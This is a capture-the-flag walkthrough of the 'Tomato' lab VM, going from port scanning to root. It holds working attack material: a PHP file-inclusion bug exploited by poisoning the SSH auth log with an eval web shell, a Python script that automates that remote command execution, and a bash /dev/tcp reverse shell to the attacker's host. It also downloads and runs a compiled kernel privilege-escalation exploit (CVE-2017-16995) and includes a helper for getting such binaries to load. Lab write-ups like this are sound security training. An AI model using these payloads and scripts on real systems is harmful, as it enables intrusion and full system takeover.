Information Gathering

Note: the OVA can be imported straight into VMware.

  • First, check the Kali IP address:
root at kali in ~ 
$ ip --color address
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:36:e9:5d brd ff:ff:ff:ff:ff:ff
inet 10.10.8.17/24 brd 10.10.8.255 scope global dynamic noprefixroute eth0
valid_lft 1717sec preferred_lft 1717sec
inet6 fe80::fff8:80c4:4cdf:a014/64 scope link noprefixroute
valid_lft forever preferred_lft forever

Host Discovery

  • An Nmap ping sweep of the subnet identifies the target as 10.10.8.19 (the .1, .2 and .254 entries are VMware infrastructure, .17 is Kali itself):
root at kali in ~/Tomato
$ nmap -sn --min-rate 10000 10.10.8.0/24 -oN nmap_ip.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-14 15:32 CST
Nmap scan report for 10.10.8.1
Host is up (0.000077s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.8.2
Host is up (0.000087s latency).
MAC Address: 00:50:56:EA:61:D3 (VMware)
Nmap scan report for 10.10.8.12
Host is up (0.000070s latency).
MAC Address: 00:0C:29:D8:0A:9D (VMware)
Nmap scan report for 10.10.8.19
Host is up (0.00015s latency).
MAC Address: 00:0C:29:B5:D5:EF (VMware)
Nmap scan report for 10.10.8.254
Host is up (0.000052s latency).
MAC Address: 00:50:56:E7:3A:52 (VMware)
Nmap scan report for 10.10.8.17
Host is up.
Nmap done: 256 IP addresses (6 hosts up) scanned in 12.37 seconds

Port Scanning

  • Scan all 65535 TCP ports for open ones:
root at kali in ~/Tomato
$ nmap -p- -sC -T4 --min-rate 10000 10.10.8.19 -oN nmap_port.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-14 15:32 CST
Nmap scan report for 10.10.8.19
Host is up (0.000039s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
|_http-title: Tomato
2211/tcp open emwin
8888/tcp open sun-answerbook
MAC Address: 00:0C:29:B5:D5:EF (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.20 seconds

Service Identification

  • Identify the services on the open ports, with version and OS detection (2211 turns out to be SSH, 8888 an nginx site behind HTTP Basic auth):
root at kali in ~/Tomato 
$ nmap -p21,80,2211,8888 -sV -O -A -sC -T4 --min-rate 10000 10.10.8.19 -oN nmap_server.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-14 15:36 CST
Nmap scan report for 10.10.8.19
Host is up (0.00076s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tomato
2211/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d2:53:0a:91:8c:f1:a6:10:11:0d:9e:0f:22:f8:49:8e (RSA)
| 256 b3:12:60:32:48:28:eb:ac:80:de:17:d7:96:77:6e:2f (ECDSA)
|_ 256 36:6f:52:ad:fe:f7:92:3e:a2:51:0f:73:06:8d:80:13 (ED25519)
8888/tcp open http nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Private Property
|_http-title: 401 Authorization Required
MAC Address: 00:0C:29:B5:D5:EF (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.76 ms 10.10.8.19

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.39 seconds

Vulnerability Scanning

  • Run Nmap's vuln script category against the target:
root at kali in ~/Tomato 
$ nmap --script=vuln -T4 --min-rate 10000 10.10.8.19 -oN nmap_vuln.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-14 15:37 CST
Nmap scan report for 10.10.8.19
Host is up (0.000083s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
8888/tcp open sun-answerbook
MAC Address: 00:0C:29:B5:D5:EF (VMware)

Nmap done: 1 IP address (1 host up) scanned in 323.50 seconds
  • Nothing in these results is useful: the only hit is a Slowloris DoS check, which does not help get in. Note that without -p- this scan only covered Nmap's default 1000 ports, so port 2211 was not scripted at all.

Directory Scanning

root at kali in ~/Tomato 
$ dirsearch -u http://10.10.8.19 -o $PWD/dirsearch.txt

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/Tomato/dirsearch.txt

Error Log: /root/.dirsearch/logs/errors-24-06-14_15-45-26.log

Target: http://10.10.8.19/

[15:45:26] Starting:
[15:45:26] 403 - 275B - /.ht_wsr.txt
[15:45:26] 403 - 275B - /.htaccess.bak1
[15:45:26] 403 - 275B - /.htaccess.sample
......

root at kali in ~/Tomato
$ cat dirsearch.txt | grep 200
200 652B http://10.10.8.19:80/index.html

Exploitation

  • Visiting what the scan found: this is clearly a custom-built site.


  • Port 80 serves nothing but a single image, so look at port 8888 next:


  • The service on 8888 requires a login (HTTP Basic auth, realm "Private Property") and gives away nothing else.

Directory Scanning v2

  • With so little found, try a different wordlist:
root at kali in ~/Tomato 
$ dirsearch -u http://10.10.8.19 -o $PWD/dirsearch.txt -w /usr/share/dirb/wordlists/common.txt

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 4613

Output File: /root/Tomato/dirsearch.txt

Error Log: /root/.dirsearch/logs/errors-24-06-14_15-50-40.log

Target: http://10.10.8.19/

[15:50:40] Starting:
[15:50:41] 301 - 316B - /antibot_image -> http://10.10.8.19/antibot_image/
[15:50:43] 200 - 652B - /index.html
[15:50:46] 403 - 275B - /server-status

Task Completed
  • An antibot_image directory turns up; browse to it:


  • The page lists an info.php; open it:


File Inclusion

  • It is just a plain phpinfo() page, but the author has oddly left a hint in it; right-click and view the page source:


  • The source contains a file-inclusion vulnerability: the image parameter goes straight into include() with no validation. Try to exploit it:
<?php include $_GET['image']?>


  • Supplying a file path in the image parameter reads that file straight back into the page. Next, try the PHP stream wrappers (php://, data:// and so on).
  • None of the wrapper attempts yield code execution; the inclusion is only usable for reading files.

WebShell

  • Since the inclusion can only read files, but the target also exposes SSH on port 2211, try log poisoning: sshd writes every attempted username to the auth log, and including that log executes any PHP embedded in it.
  • Locate the target's authentication log (the Ubuntu default):
/var/log/auth.log


  • The log is at /var/log/auth.log and is readable through the inclusion. Check whether a failed login with an arbitrary username (here Yongz) gets written to it:
root at kali in ~/Tomato 
$ ssh 'Yongz'@10.10.8.19 -p 2211
The authenticity of host '[10.10.8.19]:2211 ([10.10.8.19]:2211)' can't be established.
ED25519 key fingerprint is SHA256:99Mk+oWitdg2e434cvlhvYgeQaMwRs76tgSLrezh9/I.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.8.19]:2211' (ED25519) to the list of known hosts.
Yongz@10.10.8.19's password:
Permission denied, please try again.
Yongz@10.10.8.19's password:
Permission denied, please try again.
Yongz@10.10.8.19's password:
Yongz@10.10.8.19: Permission denied (publickey,password).


  • The Yongz attempt shows up in the included log, so use the ssh client to plant a WebShell: the username is the PHP payload, and sshd copies it into auth.log as-is:
root at kali in ~/Tomato 
$ ssh '<?php echo 404;eval($_REQUEST[1])?>'@10.10.8.19 -p 2211
<?php echo 404;eval($_REQUEST[1])?>@10.10.8.19's password:
Permission denied, please try again.
<?php echo 404;eval($_REQUEST[1])?>@10.10.8.19's password:
Permission denied, please try again.
<?php echo 404;eval($_REQUEST[1])?>@10.10.8.19's password:
<?php echo 404;eval($_REQUEST[1])?>@10.10.8.19: Permission denied (publickey,password).
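The poisoning step above, scripted end to end, as an added example that is not code from the original writeup: one failed SSH login plants the stager as the username, after which each request to the inclusion passes PHP in the 1 parameter, so the AntSword step can be replaced by plain HTTP requests. It assumes info.php sits at /antibot_image/antibots/info.php (the directory the later reverse shell lands in) and uses the lab addresses and ports from this writeup; the BEGIN/END markers and the base64 wrapping of the command are this example's own conventions.

```python
#!/usr/bin/env python3
"""SSH auth.log poisoning through the info.php inclusion, scripted.

Added example, not code from the original writeup. Assumes info.php is at
/antibot_image/antibots/info.php and uses the writeup's lab addresses.
"""
import base64
import re
import subprocess
import urllib.parse
import urllib.request
from typing import Optional

TARGET = "10.10.8.19"
SSH_PORT = 2211
BASE_URL = f"http://{TARGET}"
LFI_PATH = "/antibot_image/antibots/info.php"   # assumed location of info.php
AUTH_LOG = "/var/log/auth.log"

# The same stager the writeup used as the SSH username. sshd records it in
# auth.log ("Invalid user <?php ...?> from ..."), and include() then runs it.
PHP_STAGER = "<?php echo 404;eval($_REQUEST[1])?>"

# Markers fencing command output so it can be cut out of the phpinfo() page
# and the surrounding log text (this example's own convention).
BEGIN, END = "__BEGIN_OUT__", "__END_OUT__"


def poison_auth_log(host: str = TARGET, port: int = SSH_PORT,
                    username: str = PHP_STAGER) -> int:
    """One SSH authentication attempt with the stager as the username.
    sshd logs the username on the first userauth request, before any
    password is checked, so BatchMode=yes (no password prompt) is enough.
    Returns ssh's exit status; 255 ("Permission denied") is the expected one.
    """
    cmd = ["ssh", "-p", str(port),
           "-o", "BatchMode=yes",
           "-o", "StrictHostKeyChecking=no",
           "-o", "UserKnownHostsFile=/dev/null",
           f"{username}@{host}"]
    return subprocess.run(cmd, stdout=subprocess.DEVNULL,
                          stderr=subprocess.DEVNULL).returncode


def lfi_url(path: str, php: Optional[str] = None, base: str = BASE_URL) -> str:
    """URL that makes info.php include `path`; `php`, if given, goes into the
    1 parameter that the stager's eval($_REQUEST[1]) reads."""
    params = {"image": path}
    if php is not None:
        params["1"] = php
    return base + LFI_PATH + "?" + urllib.parse.urlencode(params)


def wrap_command(cmd: str) -> str:
    """PHP for eval(): run `cmd` with its output fenced by the markers.
    base64 sidesteps quoting problems in the command text."""
    b64 = base64.b64encode(cmd.encode()).decode()
    return f'echo "{BEGIN}";system(base64_decode("{b64}"));echo "{END}";'


def extract_output(page: str) -> str:
    """Text between the first BEGIN/END pair, or '' if the stager did not run
    (log not included yet, or PHP tags mangled in the log)."""
    m = re.search(re.escape(BEGIN) + r"(.*?)" + re.escape(END), page, re.S)
    return m.group(1).strip() if m else ""


def lfi_read(path: str, base: str = BASE_URL) -> str:
    """Plain file read through the inclusion (the pre-poisoning use of the bug)."""
    with urllib.request.urlopen(lfi_url(path, base=base), timeout=15) as resp:
        return resp.read().decode("utf-8", "replace")


def run_command(cmd: str, base: str = BASE_URL) -> str:
    """Execute `cmd` on the target via the poisoned log; '' means no stager."""
    with urllib.request.urlopen(lfi_url(AUTH_LOG, wrap_command(cmd), base),
                                timeout=15) as resp:
        return extract_output(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    # Confirm the log is readable first, then poison it only if needed: every
    # extra attempt adds another copy of the stager, each run on every include.
    if "sshd" not in lfi_read(AUTH_LOG):
        raise SystemExit("auth.log not readable through the inclusion")
    if not run_command("id"):
        poison_auth_log()
    print(run_command("id"))
    print(run_command("uname -a"))
```

Poison only once: each additional SSH attempt adds further copies of the stager to the log, and every copy executes on every include, so output would be duplicated. A request whose PHP fails to run (for example a syntax error in the 1 parameter) comes back as an empty string rather than an exception, which is also what you get before poisoning.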


  • Connect with AntSword: the shell URL is info.php with image=/var/log/auth.log, and the connection password is 1, the parameter name read by eval($_REQUEST[1]):


  • Connected successfully.
  • AntSword's virtual terminal is not usable here, so bounce a reverse shell to Kali with nc instead (the second command is run through the WebShell):
# Kali
nc -lvvp 4444
# target
bash -c 'bash -i &> /dev/tcp/10.10.8.17/4444 0>&1'
  • The shell comes back:
root at kali in ~/Tomato 
$ nc -lvvp 4444
listening on [any] 4444 ...
10.10.8.19: inverse host lookup failed: Host name lookup failure
connect to [10.10.8.17] from (UNKNOWN) [10.10.8.19] 44422
bash: cannot set terminal process group (904): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/antibot_image/antibots$

Host Enumeration

  • List the users with a login shell:
www-data@ubuntu:/var/www/html/antibot_image/antibots$ cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
tomato:x:1000:1000:Tomato,,,:/home/tomato:/bin/bash
  • Look at tomato's home directory:
www-data@ubuntu:/var/www/html/antibot_image/antibots$ ls -aRl /home/tomato
/home/tomato:
total 40
drwxr-xr-x 5 tomato tomato 4096 Sep 7 2020 .
drwxr-xr-x 3 root root 4096 Sep 7 2020 ..
-rw------- 1 tomato tomato 10 Sep 7 2020 .bash_history
-rw-r--r-- 1 tomato tomato 220 Sep 7 2020 .bash_logout
-rw-r--r-- 1 tomato tomato 3771 Sep 7 2020 .bashrc
drwx------ 2 tomato tomato 4096 Sep 7 2020 .cache
drwxrwxr-x 2 tomato tomato 4096 Sep 7 2020 .nano
-rw-r--r-- 1 tomato tomato 675 Sep 7 2020 .profile
drwx------ 2 tomato tomato 4096 Sep 7 2020 .ssh
-rw-r--r-- 1 tomato tomato 0 Sep 7 2020 .sudo_as_admin_successful
-rw-rw-r-- 1 tomato tomato 175 Sep 7 2020 .wget-hsts
ls: cannot open directory '/home/tomato/.cache': Permission denied

/home/tomato/.nano:
total 8
drwxrwxr-x 2 tomato tomato 4096 Sep 7 2020 .
drwxr-xr-x 5 tomato tomato 4096 Sep 7 2020 ..
ls: cannot open directory '/home/tomato/.ssh': Permission denied
  • Check for SUID binaries:
www-data@ubuntu:/home/tomato$ find / -perm -4000 2>/dev/null
/bin/ntfs-3g
/bin/su
/bin/ping6
/bin/fusermount
/bin/mount
/bin/ping
/bin/umount
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/vmware-user-suid-wrapper
  • So far nothing useful: only stock SUID binaries, and tomato's .ssh and .cache are unreadable as www-data.

Kernel Privilege Escalation

  • Still nothing, so bring out the big gun: a kernel exploit. First check whether the target has a gcc compiler:
www-data@ubuntu:/home/tomato$ gcc -v
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'
  • Not installed, which is awkward: the exploit has to be taken prebuilt or compiled locally on Kali and then uploaded and run.
  • Check the kernel and distribution version:
www-data@ubuntu:/home/tomato$ uname -a
Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

www-data@ubuntu:/home/tomato$ cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"
NAME="Ubuntu"
VERSION="16.04 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
UBUNTU_CODENAME=xenial
  • On Kali, use searchsploit to look up exploits for this kernel and distribution version:


  • Pick 45010.c (CVE-2017-16995, a sign-extension bug in the eBPF verifier) and copy it into the working directory:
root at kali in ~/Tomato 
$ searchsploit -m 45010.c
Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/45010
Path: /usr/share/exploitdb/exploits/linux/local/45010.c
Codes: CVE-2017-16995
Verified: True
File Type: C source, ASCII text
Copied to: /root/Tomato/45010.c
  • Compile 45010.c into an executable with gcc on Kali:
root at kali in ~/Tomato 
$ gcc 45010.c -o exp

root at kali in ~/Tomato
$ ls -l exp
-rwxr-xr-x 1 root root 21616 Jun 14 17:12 exp
  • The compiled exp now has to be transferred to the target, so serve the working directory from Kali with Python's built-in HTTP server:
root at kali in ~/Tomato
$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

  • On the target, download the file with wget into /tmp, which www-data can write to:
www-data@ubuntu:/home/tomato$ cd /tmp
www-data@ubuntu:/tmp$ wget http://10.10.8.17/exp
--2024-06-14 02:13:23-- http://10.10.8.17/exp
Connecting to 10.10.8.17:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 21616 (21K) [application/octet-stream]
Saving to: 'exp'

0K .......... .......... . 100% 85.2M=0s

2024-06-14 02:13:23 (85.2 MB/s) - 'exp' saved [21616/21616]

www-data@ubuntu:/tmp$ ls -l exp
-rw-r--r-- 1 www-data www-data 21616 Jun 14 02:12 exp
  • Make exp executable and run it:
www-data@ubuntu:/tmp$ chmod +x exp
www-data@ubuntu:/tmp$ ./exp
./exp: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./exp)
  • It will not run: the binary was linked against a newer GLIBC than the target has. This is a real pitfall, and it cost me half a day.

Note: most writeups online compile the two files, 45010.c and CVE-2017-6074, directly on Kali, but on any Kali from the last few years this produces the GLIBC_2.34 error above. A dynamically linked binary records the version tag of every glibc symbol it imports, and since glibc 2.34 even __libc_start_main carries the GLIBC_2.34 tag, so anything built against glibc 2.34 or newer refuses to load on the target's 2.23.

  • The target's glibc is 2.23: ldd (Ubuntu GLIBC 2.23-0ubuntu3) 2.23
  • Kali 2023.3 ships glibc 2.37: ldd (Debian GLIBC 2.37-6) 2.37
  • Downgrading glibc on Kali is a serious hassle, so I compiled on Kali 2018.2 (ldd (Debian GLIBC 2.27-3) 2.27) instead; a binary built there references only older symbol versions, which the target's 2.23 provides. Linking statically with gcc -static, or building in a container running the target's release (Ubuntu 16.04), avoids the problem without keeping an old Kali around.
  • After escalating with CVE-2017-6074, VMware may throw an error.
  • The steps are the same as above; once compiled, upload the binary to the target and run it:
www-data@ubuntu:/tmp$ wget http://10.10.8.17/45010
--2024-06-15 00:05:21-- http://10.10.8.17/45010
Connecting to 10.10.8.17:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18184 (18K) [application/octet-stream]
Saving to: '45010'

0K .......... ....... 100% 272M=0s

2024-06-15 00:05:21 (272 MB/s) - '45010' saved [18184/18184]
www-data@ubuntu:/tmp$ chmod 777 45010
www-data@ubuntu:/tmp$ ./45010
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
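The glibc mismatch hit above can be caught on Kali before the upload instead of on the target. The following script is an added example, not part of the original writeup: it reads the versioned glibc imports from objdump -T (binutils, assumed to be installed on the build host) and compares the highest one against the target's glibc, 2.23 here as read from ldd --version. A binary built with gcc -static has no such imports and passes the check, which is the other way around the problem besides using an older build host. The script name glibc_check.py is only a suggestion.

```python
#!/usr/bin/env python3
"""Check which glibc symbol versions a dynamically linked exploit needs before
uploading it to a target with an older libc.

Added example, not from the original writeup. Assumes objdump (binutils) on
the build host; the target version comes from `ldd --version` (2.23 here).
"""
import re
import subprocess
import sys
from typing import Optional, Tuple

Version = Tuple[int, ...]

# objdump -T lists versioned imports as e.g. "GLIBC_2.34  __libc_start_main"
_GLIBC_RE = re.compile(r"\bGLIBC_(\d+(?:\.\d+)+)\b")


def parse_version(text: str) -> Version:
    """'2.23' -> (2, 23). Tuple comparison orders versions correctly, so
    2.9 < 2.34, which a plain string comparison would get wrong."""
    return tuple(int(part) for part in text.split("."))


def required_glibc(objdump_output: str) -> Optional[Version]:
    """Highest GLIBC_x.y tag referenced in `objdump -T` output, or None when
    the binary imports no versioned glibc symbols (e.g. built with -static)."""
    found = {parse_version(v) for v in _GLIBC_RE.findall(objdump_output)}
    return max(found) if found else None


def will_load(objdump_output: str, target_glibc: str) -> bool:
    """True if the loader on a target running `target_glibc` can satisfy every
    versioned glibc symbol the binary references."""
    need = required_glibc(objdump_output)
    return need is None or need <= parse_version(target_glibc)


def check_binary(path: str, target_glibc: str) -> bool:
    """Run objdump on a real file, print the verdict and return it."""
    proc = subprocess.run(["objdump", "-T", path], capture_output=True, text=True)
    # objdump may exit non-zero for a static binary ("not a dynamic object");
    # that case is fine, anything else (missing file, not an ELF) is an error.
    if proc.returncode != 0 and "not a dynamic object" not in proc.stderr + proc.stdout:
        raise RuntimeError(proc.stderr.strip() or f"objdump failed on {path}")
    need = required_glibc(proc.stdout)
    ok = will_load(proc.stdout, target_glibc)
    if need is None:
        print(f"{path}: no versioned glibc imports (static build?)")
    else:
        tag = "GLIBC_" + ".".join(map(str, need))
        verdict = "OK" if ok else f"will fail: version {tag} not found on target"
        print(f"{path}: needs {tag}, target has {target_glibc}: {verdict}")
    return ok


if __name__ == "__main__":
    if len(sys.argv) != 3:
        raise SystemExit(f"usage: {sys.argv[0]} <binary> <target-glibc-version>")
    sys.exit(0 if check_binary(sys.argv[1], sys.argv[2]) else 1)
```

Run it as python3 glibc_check.py ./exp 2.23 before serving the file; a non-zero exit means the target would print the same "version `GLIBC_x.y' not found" error seen above. The version comparison is done on integer tuples on purpose, since comparing "2.9" and "2.34" as strings gives the wrong answer.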
  • Root obtained; find the flag:
cd /root
ls
proof.txt
cat proof.txt
Sun_CSR_TEAM_TOMATO_JS_0232xx23